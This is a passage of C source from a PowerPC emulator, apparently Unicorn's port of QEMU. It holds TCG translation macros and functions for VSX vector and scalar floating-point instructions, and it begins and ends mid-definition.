gen_vsr_ptr(tcg_ctx, rA(ctx->opcode) + 32); \ xb = gen_vsr_ptr(tcg_ctx, rB(ctx->opcode) + 32); \ gen_helper_##name(tcg_ctx, tcg_ctx->cpu_env, opc, xt, xa, xb); \ tcg_temp_free_i32(tcg_ctx, opc); \ tcg_temp_free_ptr(tcg_ctx, xt); \ tcg_temp_free_ptr(tcg_ctx, xa); \ tcg_temp_free_ptr(tcg_ctx, xb); \ } #define GEN_VSX_HELPER_R2(name, op1, op2, inval, type) \ static void gen_##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i32 opc; \ TCGv_ptr xt, xb; \ if (unlikely(!ctx->vsx_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VSXU); \ return; \ } \ opc = tcg_const_i32(tcg_ctx, ctx->opcode); \ xt = gen_vsr_ptr(tcg_ctx, rD(ctx->opcode) + 32); \ xb = gen_vsr_ptr(tcg_ctx, rB(ctx->opcode) + 32); \ gen_helper_##name(tcg_ctx, tcg_ctx->cpu_env, opc, xt, xb); \ tcg_temp_free_i32(tcg_ctx, opc); \ tcg_temp_free_ptr(tcg_ctx, xt); \ tcg_temp_free_ptr(tcg_ctx, xb); \ } #define GEN_VSX_HELPER_R2_AB(name, op1, op2, inval, type) \ static void gen_##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i32 opc; \ TCGv_ptr xa, xb; \ if (unlikely(!ctx->vsx_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VSXU); \ return; \ } \ opc = tcg_const_i32(tcg_ctx, ctx->opcode); \ xa = gen_vsr_ptr(tcg_ctx, rA(ctx->opcode) + 32); \ xb = gen_vsr_ptr(tcg_ctx, rB(ctx->opcode) + 32); \ gen_helper_##name(tcg_ctx, tcg_ctx->cpu_env, opc, xa, xb); \ tcg_temp_free_i32(tcg_ctx, opc); \ tcg_temp_free_ptr(tcg_ctx, xa); \ tcg_temp_free_ptr(tcg_ctx, xb); \ } #define GEN_VSX_HELPER_XT_XB_ENV(name, op1, op2, inval, type) \ static void gen_##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i64 t0; \ TCGv_i64 t1; \ if (unlikely(!ctx->vsx_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VSXU); \ return; \ } \ t0 = tcg_temp_new_i64(tcg_ctx); \ t1 = tcg_temp_new_i64(tcg_ctx); \ get_cpu_vsrh(tcg_ctx, t0, xB(ctx->opcode)); \ gen_helper_##name(tcg_ctx, t1, tcg_ctx->cpu_env, t0); \ set_cpu_vsrh(tcg_ctx, xT(ctx->opcode), t1); \ tcg_temp_free_i64(tcg_ctx, t0); \ tcg_temp_free_i64(tcg_ctx, t1); \ } GEN_VSX_HELPER_X3(xsadddp, 0x00, 0x04, 0, PPC2_VSX) GEN_VSX_HELPER_R3(xsaddqp, 0x04, 0x00, 0, PPC2_ISA300) GEN_VSX_HELPER_X3(xssubdp, 0x00, 0x05, 0, PPC2_VSX) GEN_VSX_HELPER_X3(xsmuldp, 0x00, 0x06, 0, PPC2_VSX) GEN_VSX_HELPER_R3(xsmulqp, 0x04, 0x01, 0, PPC2_ISA300) GEN_VSX_HELPER_X3(xsdivdp, 0x00, 0x07, 0, PPC2_VSX) GEN_VSX_HELPER_R3(xsdivqp, 0x04, 0x11, 0, PPC2_ISA300) GEN_VSX_HELPER_X2(xsredp, 0x14, 0x05, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xssqrtdp, 0x16, 0x04, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xsrsqrtedp, 0x14, 0x04, 0, PPC2_VSX) GEN_VSX_HELPER_X2_AB(xstdivdp, 0x14, 0x07, 0, PPC2_VSX) GEN_VSX_HELPER_X1(xstsqrtdp, 0x14, 0x06, 0, PPC2_VSX) GEN_VSX_HELPER_X3(xscmpeqdp, 0x0C, 0x00, 0, PPC2_ISA300) GEN_VSX_HELPER_X3(xscmpgtdp, 0x0C, 0x01, 0, PPC2_ISA300) GEN_VSX_HELPER_X3(xscmpgedp, 0x0C, 0x02, 0, PPC2_ISA300) GEN_VSX_HELPER_X3(xscmpnedp, 0x0C, 0x03, 0, PPC2_ISA300) GEN_VSX_HELPER_X2_AB(xscmpexpdp, 0x0C, 0x07, 0, PPC2_ISA300) GEN_VSX_HELPER_R2_AB(xscmpexpqp, 0x04, 0x05, 0, PPC2_ISA300) GEN_VSX_HELPER_X2_AB(xscmpodp, 0x0C, 0x05, 0, PPC2_VSX) GEN_VSX_HELPER_X2_AB(xscmpudp, 0x0C, 0x04, 0, PPC2_VSX) GEN_VSX_HELPER_R2_AB(xscmpoqp, 0x04, 0x04, 0, PPC2_VSX) GEN_VSX_HELPER_R2_AB(xscmpuqp, 0x04, 0x14, 0, PPC2_VSX) GEN_VSX_HELPER_X3(xsmaxdp, 0x00, 0x14, 0, PPC2_VSX) GEN_VSX_HELPER_X3(xsmindp, 0x00, 0x15, 0, PPC2_VSX) GEN_VSX_HELPER_R3(xsmaxcdp, 0x00, 0x10, 0, PPC2_ISA300) GEN_VSX_HELPER_R3(xsmincdp, 0x00, 0x11, 0, PPC2_ISA300) GEN_VSX_HELPER_R3(xsmaxjdp, 0x00, 0x12, 0, PPC2_ISA300) GEN_VSX_HELPER_R3(xsminjdp, 0x00, 0x12, 0, PPC2_ISA300) GEN_VSX_HELPER_X2(xscvdphp, 0x16, 0x15, 0x11, PPC2_ISA300) GEN_VSX_HELPER_X2(xscvdpsp, 0x12, 0x10, 0, PPC2_VSX) GEN_VSX_HELPER_R2(xscvdpqp, 0x04, 0x1A, 0x16, PPC2_ISA300) GEN_VSX_HELPER_XT_XB_ENV(xscvdpspn, 0x16, 0x10, 0, PPC2_VSX207) GEN_VSX_HELPER_R2(xscvqpsdz, 0x04, 0x1A, 0x19, PPC2_ISA300) GEN_VSX_HELPER_R2(xscvqpswz, 0x04, 0x1A, 0x09, PPC2_ISA300) GEN_VSX_HELPER_R2(xscvqpudz, 0x04, 0x1A, 0x11, PPC2_ISA300) GEN_VSX_HELPER_R2(xscvqpuwz, 0x04, 0x1A, 0x01, PPC2_ISA300) GEN_VSX_HELPER_X2(xscvhpdp, 0x16, 0x15, 0x10, PPC2_ISA300) GEN_VSX_HELPER_R2(xscvsdqp, 0x04, 0x1A, 0x0A, PPC2_ISA300) GEN_VSX_HELPER_X2(xscvspdp, 0x12, 0x14, 0, PPC2_VSX) GEN_VSX_HELPER_XT_XB_ENV(xscvspdpn, 0x16, 0x14, 0, PPC2_VSX207) GEN_VSX_HELPER_X2(xscvdpsxds, 0x10, 0x15, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xscvdpsxws, 0x10, 0x05, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xscvdpuxds, 0x10, 0x14, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xscvdpuxws, 0x10, 0x04, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xscvsxddp, 0x10, 0x17, 0, PPC2_VSX) GEN_VSX_HELPER_R2(xscvudqp, 0x04, 0x1A, 0x02, PPC2_ISA300) GEN_VSX_HELPER_X2(xscvuxddp, 0x10, 0x16, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xsrdpi, 0x12, 0x04, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xsrdpic, 0x16, 0x06, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xsrdpim, 0x12, 0x07, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xsrdpip, 0x12, 0x06, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xsrdpiz, 0x12, 0x05, 0, PPC2_VSX) GEN_VSX_HELPER_XT_XB_ENV(xsrsp, 0x12, 0x11, 0, PPC2_VSX207) GEN_VSX_HELPER_R2(xsrqpi, 0x05, 0x00, 0, PPC2_ISA300) GEN_VSX_HELPER_R2(xsrqpxp, 0x05, 0x01, 0, PPC2_ISA300) GEN_VSX_HELPER_R2(xssqrtqp, 0x04, 0x19, 0x1B, PPC2_ISA300) GEN_VSX_HELPER_R3(xssubqp, 0x04, 0x10, 0, PPC2_ISA300) GEN_VSX_HELPER_X3(xsaddsp, 0x00, 0x00, 0, PPC2_VSX207) GEN_VSX_HELPER_X3(xssubsp, 0x00, 0x01, 0, PPC2_VSX207) GEN_VSX_HELPER_X3(xsmulsp, 0x00, 0x02, 0, PPC2_VSX207) GEN_VSX_HELPER_X3(xsdivsp, 0x00, 0x03, 0, PPC2_VSX207) GEN_VSX_HELPER_X2(xsresp, 0x14, 0x01, 0, PPC2_VSX207) GEN_VSX_HELPER_X2(xssqrtsp, 0x16, 0x00, 0, PPC2_VSX207) GEN_VSX_HELPER_X2(xsrsqrtesp, 0x14, 0x00, 0, PPC2_VSX207) GEN_VSX_HELPER_X2(xscvsxdsp, 0x10, 0x13, 0, PPC2_VSX207) GEN_VSX_HELPER_X2(xscvuxdsp, 0x10, 0x12, 0, PPC2_VSX207) GEN_VSX_HELPER_X1(xststdcsp, 0x14, 0x12, 0, PPC2_ISA300) GEN_VSX_HELPER_2(xststdcdp, 0x14, 0x16, 0, PPC2_ISA300) GEN_VSX_HELPER_2(xststdcqp, 0x04, 0x16, 0, PPC2_ISA300) GEN_VSX_HELPER_X3(xvadddp, 0x00, 0x0C, 0, PPC2_VSX) GEN_VSX_HELPER_X3(xvsubdp, 0x00, 0x0D, 0, PPC2_VSX) GEN_VSX_HELPER_X3(xvmuldp, 0x00, 0x0E, 0, PPC2_VSX) GEN_VSX_HELPER_X3(xvdivdp, 0x00, 0x0F, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xvredp, 0x14, 0x0D, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xvsqrtdp, 0x16, 0x0C, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xvrsqrtedp, 0x14, 0x0C, 0, PPC2_VSX) GEN_VSX_HELPER_X2_AB(xvtdivdp, 0x14, 0x0F, 0, PPC2_VSX) GEN_VSX_HELPER_X1(xvtsqrtdp, 0x14, 0x0E, 0, PPC2_VSX) GEN_VSX_HELPER_X3(xvmaxdp, 0x00, 0x1C, 0, PPC2_VSX) GEN_VSX_HELPER_X3(xvmindp, 0x00, 0x1D, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xvcvdpsp, 0x12, 0x18, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xvcvdpsxds, 0x10, 0x1D, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xvcvdpsxws, 0x10, 0x0D, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xvcvdpuxds, 0x10, 0x1C, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xvcvdpuxws, 0x10, 0x0C, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xvcvsxddp, 0x10, 0x1F, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xvcvuxddp, 0x10, 0x1E, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xvcvsxwdp, 0x10, 0x0F, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xvcvuxwdp, 0x10, 0x0E, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xvrdpi, 0x12, 0x0C, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xvrdpic, 0x16, 0x0E, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xvrdpim, 0x12, 0x0F, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xvrdpip, 0x12, 0x0E, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xvrdpiz, 0x12, 0x0D, 0, PPC2_VSX) GEN_VSX_HELPER_X3(xvaddsp, 0x00, 0x08, 0, PPC2_VSX) GEN_VSX_HELPER_X3(xvsubsp, 0x00, 0x09, 0, PPC2_VSX) GEN_VSX_HELPER_X3(xvmulsp, 0x00, 0x0A, 0, PPC2_VSX) GEN_VSX_HELPER_X3(xvdivsp, 0x00, 0x0B, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xvresp, 0x14, 0x09, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xvsqrtsp, 0x16, 0x08, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xvrsqrtesp, 0x14, 0x08, 0, PPC2_VSX) GEN_VSX_HELPER_X2_AB(xvtdivsp, 0x14, 0x0B, 0, PPC2_VSX) GEN_VSX_HELPER_X1(xvtsqrtsp, 0x14, 0x0A, 0, PPC2_VSX) GEN_VSX_HELPER_X3(xvmaxsp, 0x00, 0x18, 0, PPC2_VSX) GEN_VSX_HELPER_X3(xvminsp, 0x00, 0x19, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xvcvspdp, 0x12, 0x1C, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xvcvhpsp, 0x16, 0x1D, 0x18, PPC2_ISA300) GEN_VSX_HELPER_X2(xvcvsphp, 0x16, 0x1D, 0x19, PPC2_ISA300) GEN_VSX_HELPER_X2(xvcvspsxds, 0x10, 0x19, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xvcvspsxws, 0x10, 0x09, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xvcvspuxds, 0x10, 0x18, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xvcvspuxws, 0x10, 0x08, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xvcvsxdsp, 0x10, 0x1B, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xvcvuxdsp, 0x10, 0x1A, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xvcvsxwsp, 0x10, 0x0B, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xvcvuxwsp, 0x10, 0x0A, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xvrspi, 0x12, 0x08, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xvrspic, 0x16, 0x0A, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xvrspim, 0x12, 0x0B, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xvrspip, 0x12, 0x0A, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xvrspiz, 0x12, 0x09, 0, PPC2_VSX) GEN_VSX_HELPER_2(xvtstdcsp, 0x14, 0x1A, 0, PPC2_VSX) GEN_VSX_HELPER_2(xvtstdcdp, 0x14, 0x1E, 0, PPC2_VSX) GEN_VSX_HELPER_X3(xxperm, 0x08, 0x03, 0, PPC2_ISA300) GEN_VSX_HELPER_X3(xxpermr, 0x08, 0x07, 0, PPC2_ISA300) #define GEN_VSX_HELPER_VSX_MADD(name, op1, aop, mop, inval, type) \ static void gen_##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_ptr xt, xa, b, c; \ if (unlikely(!ctx->vsx_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VSXU); \ return; \ } \ xt = gen_vsr_ptr(tcg_ctx, xT(ctx->opcode)); \ xa = gen_vsr_ptr(tcg_ctx, xA(ctx->opcode)); \ if (ctx->opcode & PPC_BIT32(25)) { \ /* \ * AxT + B \ */ \ b = gen_vsr_ptr(tcg_ctx, xT(ctx->opcode)); \ c = gen_vsr_ptr(tcg_ctx, xB(ctx->opcode)); \ } else { \ /* \ * AxB + T \ */ \ b = gen_vsr_ptr(tcg_ctx, xB(ctx->opcode)); \ c = gen_vsr_ptr(tcg_ctx, xT(ctx->opcode)); \ } \ gen_helper_##name(tcg_ctx, tcg_ctx->cpu_env, xt, xa, b, c); \ tcg_temp_free_ptr(tcg_ctx, xt); \ tcg_temp_free_ptr(tcg_ctx, xa); \ tcg_temp_free_ptr(tcg_ctx, b); \ tcg_temp_free_ptr(tcg_ctx, c); \ } GEN_VSX_HELPER_VSX_MADD(xsmadddp, 0x04, 0x04, 0x05, 0, PPC2_VSX) GEN_VSX_HELPER_VSX_MADD(xsmsubdp, 0x04, 0x06, 0x07, 0, PPC2_VSX) GEN_VSX_HELPER_VSX_MADD(xsnmadddp, 0x04, 0x14, 0x15, 0, PPC2_VSX) GEN_VSX_HELPER_VSX_MADD(xsnmsubdp, 0x04, 0x16, 0x17, 0, PPC2_VSX) GEN_VSX_HELPER_VSX_MADD(xsmaddsp, 0x04, 0x00, 0x01, 0, PPC2_VSX207) GEN_VSX_HELPER_VSX_MADD(xsmsubsp, 0x04, 0x02, 0x03, 0, PPC2_VSX207) GEN_VSX_HELPER_VSX_MADD(xsnmaddsp, 0x04, 0x10, 0x11, 0, PPC2_VSX207) GEN_VSX_HELPER_VSX_MADD(xsnmsubsp, 0x04, 0x12, 0x13, 0, PPC2_VSX207) GEN_VSX_HELPER_VSX_MADD(xvmadddp, 0x04, 0x0C, 0x0D, 0, PPC2_VSX) GEN_VSX_HELPER_VSX_MADD(xvmsubdp, 0x04, 0x0E, 0x0F, 0, PPC2_VSX) GEN_VSX_HELPER_VSX_MADD(xvnmadddp, 0x04, 0x1C, 0x1D, 0, PPC2_VSX) GEN_VSX_HELPER_VSX_MADD(xvnmsubdp, 0x04, 0x1E, 0x1F, 0, PPC2_VSX) GEN_VSX_HELPER_VSX_MADD(xvmaddsp, 0x04, 0x08, 0x09, 0, PPC2_VSX) GEN_VSX_HELPER_VSX_MADD(xvmsubsp, 0x04, 0x0A, 0x0B, 0, PPC2_VSX) GEN_VSX_HELPER_VSX_MADD(xvnmaddsp, 0x04, 0x18, 0x19, 0, PPC2_VSX) GEN_VSX_HELPER_VSX_MADD(xvnmsubsp, 0x04, 0x1A, 0x1B, 0, PPC2_VSX) static void gen_xxbrd(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 xth; TCGv_i64 xtl; TCGv_i64 xbh; TCGv_i64 xbl; if (unlikely(!ctx->vsx_enabled)) { gen_exception(ctx, POWERPC_EXCP_VSXU); return; } xth = tcg_temp_new_i64(tcg_ctx); xtl = tcg_temp_new_i64(tcg_ctx); xbh = tcg_temp_new_i64(tcg_ctx); xbl = tcg_temp_new_i64(tcg_ctx); get_cpu_vsrh(tcg_ctx, xbh, xB(ctx->opcode)); get_cpu_vsrl(tcg_ctx, xbl, xB(ctx->opcode)); tcg_gen_bswap64_i64(tcg_ctx, xth, xbh); tcg_gen_bswap64_i64(tcg_ctx, xtl, xbl); set_cpu_vsrh(tcg_ctx, xT(ctx->opcode), xth); set_cpu_vsrl(tcg_ctx, xT(ctx->opcode), xtl); tcg_temp_free_i64(tcg_ctx, xth); tcg_temp_free_i64(tcg_ctx, xtl); tcg_temp_free_i64(tcg_ctx, xbh); tcg_temp_free_i64(tcg_ctx, xbl); } static void gen_xxbrh(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 xth; TCGv_i64 xtl; TCGv_i64 xbh; TCGv_i64 xbl; if (unlikely(!ctx->vsx_enabled)) { gen_exception(ctx, POWERPC_EXCP_VSXU); return; } xth = tcg_temp_new_i64(tcg_ctx); xtl = tcg_temp_new_i64(tcg_ctx); xbh = tcg_temp_new_i64(tcg_ctx); xbl = tcg_temp_new_i64(tcg_ctx); get_cpu_vsrh(tcg_ctx, xbh, xB(ctx->opcode)); get_cpu_vsrl(tcg_ctx, xbl, xB(ctx->opcode)); gen_bswap16x8(tcg_ctx, xth, xtl, xbh, xbl); set_cpu_vsrh(tcg_ctx, xT(ctx->opcode), xth); set_cpu_vsrl(tcg_ctx, xT(ctx->opcode), xtl); tcg_temp_free_i64(tcg_ctx, xth); tcg_temp_free_i64(tcg_ctx, xtl); tcg_temp_free_i64(tcg_ctx, xbh); tcg_temp_free_i64(tcg_ctx, xbl); } static void gen_xxbrq(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 xth; TCGv_i64 xtl; TCGv_i64 xbh; TCGv_i64 xbl; TCGv_i64 t0; if (unlikely(!ctx->vsx_enabled)) { gen_exception(ctx, POWERPC_EXCP_VSXU); return; } xth = tcg_temp_new_i64(tcg_ctx); xtl = tcg_temp_new_i64(tcg_ctx); xbh = tcg_temp_new_i64(tcg_ctx); xbl = tcg_temp_new_i64(tcg_ctx); get_cpu_vsrh(tcg_ctx, xbh, xB(ctx->opcode)); get_cpu_vsrl(tcg_ctx, xbl, xB(ctx->opcode)); t0 = tcg_temp_new_i64(tcg_ctx); tcg_gen_bswap64_i64(tcg_ctx, t0, xbl); tcg_gen_bswap64_i64(tcg_ctx, xtl, xbh); set_cpu_vsrl(tcg_ctx, xT(ctx->opcode), xtl); tcg_gen_mov_i64(tcg_ctx, xth, t0); set_cpu_vsrh(tcg_ctx, xT(ctx->opcode), xth); tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, xth); tcg_temp_free_i64(tcg_ctx, xtl); tcg_temp_free_i64(tcg_ctx, xbh); tcg_temp_free_i64(tcg_ctx, xbl); } static void gen_xxbrw(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 xth; TCGv_i64 xtl; TCGv_i64 xbh; TCGv_i64 xbl; if (unlikely(!ctx->vsx_enabled)) { gen_exception(ctx, POWERPC_EXCP_VSXU); return; } xth = tcg_temp_new_i64(tcg_ctx); xtl = tcg_temp_new_i64(tcg_ctx); xbh = tcg_temp_new_i64(tcg_ctx); xbl = tcg_temp_new_i64(tcg_ctx); get_cpu_vsrh(tcg_ctx, xbh, xB(ctx->opcode)); get_cpu_vsrl(tcg_ctx, xbl, xB(ctx->opcode)); gen_bswap32x4(tcg_ctx, xth, xtl, xbh, xbl); set_cpu_vsrh(tcg_ctx, xT(ctx->opcode), xth); set_cpu_vsrl(tcg_ctx, xT(ctx->opcode), xtl); tcg_temp_free_i64(tcg_ctx, xth); tcg_temp_free_i64(tcg_ctx, xtl); tcg_temp_free_i64(tcg_ctx, xbh); tcg_temp_free_i64(tcg_ctx, xbl); } #define VSX_LOGICAL(name, vece, tcg_op) \ static void glue(gen_, name)(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ if (unlikely(!ctx->vsx_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VSXU); \ return; \ } \ tcg_op(tcg_ctx, vece, vsr_full_offset(xT(ctx->opcode)), \ vsr_full_offset(xA(ctx->opcode)), \ vsr_full_offset(xB(ctx->opcode)), 16, 16); \ } VSX_LOGICAL(xxland, MO_64, tcg_gen_gvec_and) VSX_LOGICAL(xxlandc, MO_64, tcg_gen_gvec_andc) VSX_LOGICAL(xxlor, MO_64, tcg_gen_gvec_or) VSX_LOGICAL(xxlxor, MO_64, tcg_gen_gvec_xor) VSX_LOGICAL(xxlnor, MO_64, tcg_gen_gvec_nor) VSX_LOGICAL(xxleqv, MO_64, tcg_gen_gvec_eqv) VSX_LOGICAL(xxlnand, MO_64, tcg_gen_gvec_nand) VSX_LOGICAL(xxlorc, MO_64, tcg_gen_gvec_orc) #define VSX_XXMRG(name, high) \ static void glue(gen_, name)(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i64 a0, a1, b0, b1, tmp; \ if (unlikely(!ctx->vsx_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VSXU); \ return; \ } \ a0 = tcg_temp_new_i64(tcg_ctx); \ a1 = tcg_temp_new_i64(tcg_ctx); \ b0 = tcg_temp_new_i64(tcg_ctx); \ b1 = tcg_temp_new_i64(tcg_ctx); \ tmp = tcg_temp_new_i64(tcg_ctx); \ if (high) { \ get_cpu_vsrh(tcg_ctx, a0, xA(ctx->opcode)); \ get_cpu_vsrh(tcg_ctx, a1, xA(ctx->opcode)); \ get_cpu_vsrh(tcg_ctx, b0, xB(ctx->opcode)); \ get_cpu_vsrh(tcg_ctx, b1, xB(ctx->opcode)); \ } else { \ get_cpu_vsrl(tcg_ctx, a0, xA(ctx->opcode)); \ get_cpu_vsrl(tcg_ctx, a1, xA(ctx->opcode)); \ get_cpu_vsrl(tcg_ctx, b0, xB(ctx->opcode)); \ get_cpu_vsrl(tcg_ctx, b1, xB(ctx->opcode)); \ } \ tcg_gen_shri_i64(tcg_ctx, a0, a0, 32); \ tcg_gen_shri_i64(tcg_ctx, b0, b0, 32); \ tcg_gen_deposit_i64(tcg_ctx, tmp, b0, a0, 32, 32); \ set_cpu_vsrh(tcg_ctx, xT(ctx->opcode), tmp); \ tcg_gen_deposit_i64(tcg_ctx, tmp, b1, a1, 32, 32); \ set_cpu_vsrl(tcg_ctx, xT(ctx->opcode), tmp); \ tcg_temp_free_i64(tcg_ctx, a0); \ tcg_temp_free_i64(tcg_ctx, a1); \ tcg_temp_free_i64(tcg_ctx, b0); \ tcg_temp_free_i64(tcg_ctx, b1); \ tcg_temp_free_i64(tcg_ctx, tmp); \ } VSX_XXMRG(xxmrghw, 1) VSX_XXMRG(xxmrglw, 0) static void gen_xxsel(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int rt = xT(ctx->opcode); int ra = xA(ctx->opcode); int rb = xB(ctx->opcode); int rc = xC(ctx->opcode); if (unlikely(!ctx->vsx_enabled)) { gen_exception(ctx, POWERPC_EXCP_VSXU); return; } tcg_gen_gvec_bitsel(tcg_ctx, MO_64, vsr_full_offset(rt), vsr_full_offset(rc), vsr_full_offset(rb), vsr_full_offset(ra), 16, 16); } static void gen_xxspltw(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int rt = xT(ctx->opcode); int rb = xB(ctx->opcode); int uim = UIM(ctx->opcode); int tofs, bofs; if (unlikely(!ctx->vsx_enabled)) { gen_exception(ctx, POWERPC_EXCP_VSXU); return; } tofs = vsr_full_offset(rt); bofs = vsr_full_offset(rb); bofs += uim << MO_32; #ifndef HOST_WORDS_BIGENDIAN bofs ^= 8 | 4; #endif tcg_gen_gvec_dup_mem(tcg_ctx, MO_32, tofs, bofs, 16, 16); } #define pattern(x) (((x) & 0xff) * (~(uint64_t)0 / 0xff)) static void gen_xxspltib(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint8_t uim8 = IMM8(ctx->opcode); int rt = xT(ctx->opcode); if (rt < 32) { if (unlikely(!ctx->vsx_enabled)) { gen_exception(ctx, POWERPC_EXCP_VSXU); return; } } else { if (unlikely(!ctx->altivec_enabled)) { gen_exception(ctx, POWERPC_EXCP_VPU); return; } } tcg_gen_gvec_dup8i(tcg_ctx, vsr_full_offset(rt), 16, 16, uim8); } static void gen_xxsldwi(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 xth, xtl; if (unlikely(!ctx->vsx_enabled)) { gen_exception(ctx, POWERPC_EXCP_VSXU); return; } xth = tcg_temp_new_i64(tcg_ctx); xtl = tcg_temp_new_i64(tcg_ctx); switch (SHW(ctx->opcode)) { case 0: { get_cpu_vsrh(tcg_ctx, xth, xA(ctx->opcode)); get_cpu_vsrl(tcg_ctx, xtl, xA(ctx->opcode)); break; } case 1: { TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); get_cpu_vsrh(tcg_ctx, xth, xA(ctx->opcode)); tcg_gen_shli_i64(tcg_ctx, xth, xth, 32); get_cpu_vsrl(tcg_ctx, t0, xA(ctx->opcode)); tcg_gen_shri_i64(tcg_ctx, t0, t0, 32); tcg_gen_or_i64(tcg_ctx, xth, xth, t0); get_cpu_vsrl(tcg_ctx, xtl, xA(ctx->opcode)); tcg_gen_shli_i64(tcg_ctx, xtl, xtl, 32); get_cpu_vsrh(tcg_ctx, t0, xB(ctx->opcode)); tcg_gen_shri_i64(tcg_ctx, t0, t0, 32); tcg_gen_or_i64(tcg_ctx, xtl, xtl, t0); tcg_temp_free_i64(tcg_ctx, t0); break; } case 2: { get_cpu_vsrl(tcg_ctx, xth, xA(ctx->opcode)); get_cpu_vsrh(tcg_ctx, xtl, xB(ctx->opcode)); break; } case 3: { TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); get_cpu_vsrl(tcg_ctx, xth, xA(ctx->opcode)); tcg_gen_shli_i64(tcg_ctx, xth, xth, 32); get_cpu_vsrh(tcg_ctx, t0, xB(ctx->opcode)); tcg_gen_shri_i64(tcg_ctx, t0, t0, 32); tcg_gen_or_i64(tcg_ctx, xth, xth, t0); get_cpu_vsrh(tcg_ctx, xtl, xB(ctx->opcode)); tcg_gen_shli_i64(tcg_ctx, xtl, xtl, 32); get_cpu_vsrl(tcg_ctx, t0, xB(ctx->opcode)); tcg_gen_shri_i64(tcg_ctx, t0, t0, 32); tcg_gen_or_i64(tcg_ctx, xtl, xtl, t0); tcg_temp_free_i64(tcg_ctx, t0); break; } } set_cpu_vsrh(tcg_ctx, xT(ctx->opcode), xth); set_cpu_vsrl(tcg_ctx, xT(ctx->opcode), xtl); tcg_temp_free_i64(tcg_ctx, xth); tcg_temp_free_i64(tcg_ctx, xtl); } #define VSX_EXTRACT_INSERT(name) \ static void gen_##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_ptr xt, xb; \ TCGv_i32 t0; \ TCGv_i64 t1; \ uint8_t uimm = UIMM4(ctx->opcode); \ \ if (unlikely(!ctx->vsx_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VSXU); \ return; \ } \ xt = gen_vsr_ptr(tcg_ctx, xT(ctx->opcode)); \ xb = gen_vsr_ptr(tcg_ctx, xB(ctx->opcode)); \ t0 = tcg_temp_new_i32(tcg_ctx); \ t1 = tcg_temp_new_i64(tcg_ctx); \ /* \ * uimm > 15 out of bound and for \ * uimm > 12 handle as per hardware in helper \ */ \ if (uimm > 15) { \ tcg_gen_movi_i64(tcg_ctx, t1, 0); \ set_cpu_vsrh(tcg_ctx, xT(ctx->opcode), t1); \ 